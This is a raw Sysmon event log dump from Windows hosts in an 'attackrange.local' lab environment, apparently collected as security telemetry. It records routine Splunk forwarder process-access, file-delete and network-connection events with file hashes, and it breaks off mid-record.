08:07:53.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F859-60EB-F77D-00000000CF01}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.520{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F859-60EB-F77D-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:53.506{466BC892-F859-60EB-F77D-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.674{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4B5236C02A53CB5BAF1552D69D2A932,SHA256=103A8D1DCEF9C39D522AF402D65541D69BAA572C4497E8616220E0CD210587BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:54.361{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E80378A0C6B5D0AF257AB21D49B48C08,SHA256=5692FCA8783E0759B3728DD7120ACB9DF31A55989C040570A8A0CB15FC6263EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F85A-60EB-F87D-00000000CF01}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:54.205{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:54.205{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F85A-60EB-F87D-00000000CF01}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.205{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F85A-60EB-F87D-00000000CF01}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:54.190{466BC892-F85A-60EB-F87D-00000000CF01}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:55.689{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64A8B17E0541F55EBB6314329570EA2A,SHA256=81120E7C0AF0C93BED47FCB6D99C6FAB72F58A287A4BEA06007481D4E895407C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:55.361{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2362031FAB1AD6DF758612057CC60C42,SHA256=3263F66D0BD840BB458948B0CD97339E6F2CE7DF79E964CD107A450554DC96BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:55.190{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7098B444BA5D05B5A8E01310BEBC6AB4,SHA256=04985468B8E24E1BCD4B2F5C663E594504CF438ADA9C5DD008A6091282A08B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:55.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEAC0A9473D00E9F55DC0AACC1101EA8,SHA256=FB335687061CC4178894ACB78AD9E0FA9F01597F14E107C4A44EBBF29A1F8CF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:55.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04E36365C2237E66041194ED9ADC5E5F,SHA256=159586B5154D8EF676E869671C02AA528985EB182A1F447FD485402C8AC03DA7,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:56.720{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9E7A362D5A439DC87220AE9476D5F97,SHA256=F9FE4B2A6E8118D203F8F6702919A5BA91DE8592A4A8CCED164750315D12949C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:56.376{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC809090B09BF519D538078A9948EDA,SHA256=3E2B369FEE630D69CE5314793E9A1D8AFEFFB7D6C96B5FE03D48107B77F24C86,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:54.098{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-24406-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001054761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:57.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=364A95FEAE88C0B428EC751E9D571669,SHA256=83C42CD935CE2FF15DBBED9EB4E440CD96CF9E61EE273674EBC29FC2ACA7173C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:57.408{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00EF97D72C8C73AF8A78DFA027440826,SHA256=02C459818C36C547EFFE9512BA7215BCCD2C575781BE2AD0202B02EA98F8315C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:57.373{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:58.773{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10371F50A39B216D10D185EC0929F486,SHA256=CEFACCCCD0022648EEB5E5F4221C3CB10FABB07AAE636223E56D62CC4DB1BA9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:58.439{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163D536BD04ED0534DEC9595F3BA471B,SHA256=0A6E3914ACD465B2E8F338E818E13E3D945B0BCADE181B259071B6C1F9A9A303,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:59.773{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2F750955B5D44145ABFE01F289C6392,SHA256=FAE02F408DDE9FCB022D407A97F066697450452EA38F59ECAFCF7BAAC8902481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:59.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C89F28585091B81329FA2171E5434C79,SHA256=CC25490D3E054163D6B0D8F50A6553855C5A64B66E2BE93C55627838715D8CF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.888{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61971-false10.0.1.12-8089- 354300x80000000000000001054763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.700{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61970-false10.0.1.12-8000- 354300x8000000000000000810412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:57.228{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57465-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001054768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.417{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61972-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001054767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.417{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61972-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001054766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:00.774{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE534B543730738DC870F5EFB5530E04,SHA256=3203BA9FB6C0DEDA552FD68A94213107CA313AE8DBE48510CAE38F8C8ED55C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:00.486{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBB52B610F926B886C1B5242CA5CEC57,SHA256=401016147934927E371A30AC5FB3A5A72CDA584278DCD94A5EC111CFD7B905BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:01.789{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D5D7A307D54896B4E050029E3BE3F38,SHA256=B02DD5AB1D0010295FBBFEFDE411B11C4DCDD603F30ADBC77EE25455D9A47576,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:01.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2FF89DEA84555DBCDCA9B15EBFA0BD8,SHA256=E69903E14399D9C23638E570E4D2B5D16440C629C353C5EB50EC14CC25EA4732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.978{466BC892-F862-60EB-F97D-00000000CF01}9624ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_i0hkp330.diw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 